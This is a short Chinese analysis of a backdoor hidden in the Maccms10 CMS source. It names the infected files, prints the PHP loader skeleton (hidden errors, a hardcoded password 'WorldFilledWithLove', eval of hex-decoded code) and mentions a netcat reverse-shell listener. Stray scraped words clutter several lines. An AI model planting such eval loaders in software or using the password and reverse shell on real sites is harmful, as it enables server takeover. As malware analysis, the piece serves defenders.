Maccms 後門分析php
Maccms網站基於php+mysql的系統,有易用性、功能良好等優勢,用途普遍html
打開源碼mysql
maccms10\extend\Qcloud\Sms\sms.php是一個後門sql
maccms10\extend\upyun\src\Upyun\Api\format.php也是一個後門shell
能夠看到二者內容同樣函數
<?php網站
error_reporting(E_ERROR);編碼
@ini_set('display_errors','Off');spa
@ini_set('max_execution_time',20000);3d
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//密碼WorldFilledWithLove
function s{
$str=」編碼以後的惡意代碼」;
$str = str_rot13($str);//對惡意代碼進行ROT13編碼
m($str);
}
function m($str){
global $password;
$jj = '';
eval($jj.pack('H*',$str).$jj);//對混淆的php進行解碼,解碼以後的代碼執行對eval函數的解析
}
s();
?>
訪問
解碼後的密碼敲進去WorldFilledWithLove
反彈shell(將肉雞/目標機上的終端或者解析器或shell彈到攻擊者的電腦中,須要攻擊者提早監聽,使用NC監聽:nc –lvvp 7777,-l)